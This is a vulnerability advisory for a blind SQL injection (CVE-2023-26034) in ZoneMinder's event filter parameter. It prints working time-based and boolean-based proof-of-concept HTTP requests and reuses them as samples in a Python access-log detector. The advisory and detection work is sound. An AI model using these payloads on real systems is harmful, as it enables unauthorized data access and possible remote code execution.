CVE-2023-26034 - SQL Injection in zoneminder/zoneminder
Description
ZoneMinder is a free, open-source, closed-circuit television software application for Linux which supports IP, USB and analog cameras. Versions prior to 1.36.33 and 1.37.33 are affected by a SQL injection vulnerability. The (blind) SQL injection vulnerability is present within the filter[Query][terms][0][attr] query string parameter of the /zm/index.php endpoint. A user with the View or Edit permissions on Events may execute arbitrary SQL. The resulting impact can include unauthorized data access (and modification), authentication and/or authorization bypass, and remote code execution.
Proof of Concept
A time-based proof of concept payload using the MariaDB sleep() function, as follows:
GET http://zoneminder.local/zm/index.php?view=request&request=events&task=query&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Battr%5D=MonitorId%20/%20sleep(13)&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bop%5D==&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bval%5D=1&filter%5BQuery%5D%5Bsort_asc%5D=1&filter%5BQuery%5D%5Bsort_field%5D=StartDateTime&filter%5BQuery%5D%5Blimit%5D=0 HTTP/1.1
Host: zoneminder.local
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Content-Length: 0
Cookie: zmSkin=classic; zmCSS=base; ZMSESSID=9enmm5uqte0tqt3dgq7447odh9
A boolean-based proof of concept with a resultant true query (AND 1=1), as follows:
GET http://zoneminder.local/zm/index.php?view=request&request=events&task=query&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Battr%5D=MonitorId)%20AND%20(1=1&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bop%5D==&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bval%5D=1 HTTP/1.1
Host: zoneminder.local
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Content-Length: 0
Cookie: zmSkin=classic; zmCSS=base; ZMSESSID=cmllgeglf6h0jbetb9kvkjet2u
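Because the injected SQL travels in a single, well-known query parameter, attempts against this endpoint are easy to spot in web server access logs: a legitimate attr term is a bare attribute name such as MonitorId or StartDateTime, so anything else in filter[Query][terms][N][attr] is suspect. The following detector is an added example written for this advisory, not ZoneMinder's own code; it assumes Apache-style access logs and the /zm/ install path used in the requests above, and the three log lines are constructed samples (a benign filter followed by the two proof-of-concept payloads).

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log entries (not real traffic): a benign MonitorId
# filter, then the time-based and boolean-based payloads shown in the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2023:12:00:01 +0000] "GET /zm/index.php?view=request&request=events&task=query&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Battr%5D=MonitorId&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bop%5D==&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bval%5D=1 HTTP/1.1" 200 512
10.0.0.9 - - [10/Mar/2023:12:00:07 +0000] "GET /zm/index.php?view=request&request=events&task=query&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Battr%5D=MonitorId%20/%20sleep(13)&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bop%5D==&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bval%5D=1 HTTP/1.1" 200 512
10.0.0.9 - - [10/Mar/2023:12:00:31 +0000] "GET /zm/index.php?view=request&request=events&task=query&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Battr%5D=MonitorId)%20AND%20(1=1&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bop%5D==&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bval%5D=1 HTTP/1.1" 200 512
"""

# The vulnerable parameter, for any term index N: filter[Query][terms][N][attr]
ATTR_KEY = re.compile(r"^filter\[Query\]\[terms\]\[\d+\]\[attr\]$")
# A legitimate attr value is a bare attribute name (MonitorId, StartDateTime, ...)
IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
# Request target inside the quoted request line of a combined/common log entry
REQ_TARGET = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def suspicious_attrs(target: str) -> list[tuple[str, str]]:
    """Return (parameter, decoded value) for each attr term that is not a plain identifier."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    hits = []
    for key, values in params.items():
        if not ATTR_KEY.match(key):
            continue
        for value in values:  # parse_qs has already URL-decoded the value
            if not IDENT.match(value):
                hits.append((key, value))
    return hits


def scan_access_log(log_text: str) -> list[tuple[int, str, str, str]]:
    """Return (line number, client IP, parameter, decoded value) for every injected attr term."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQ_TARGET.search(line)
        if not m or "/zm/index.php" not in m.group(1):
            continue
        client = line.split(" ", 1)[0]
        for key, value in suspicious_attrs(m.group(1)):
            findings.append((lineno, client, key, value))
    return findings


if __name__ == "__main__":
    for lineno, client, key, value in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: {client} sent {key} = {value!r}")
```

The identifier allowlist is deliberately strict: a decoded value containing whitespace, parentheses, quotes or operators is flagged regardless of which SQL dialect or technique the attacker used, so the check is not tied to the two payload shapes shown above.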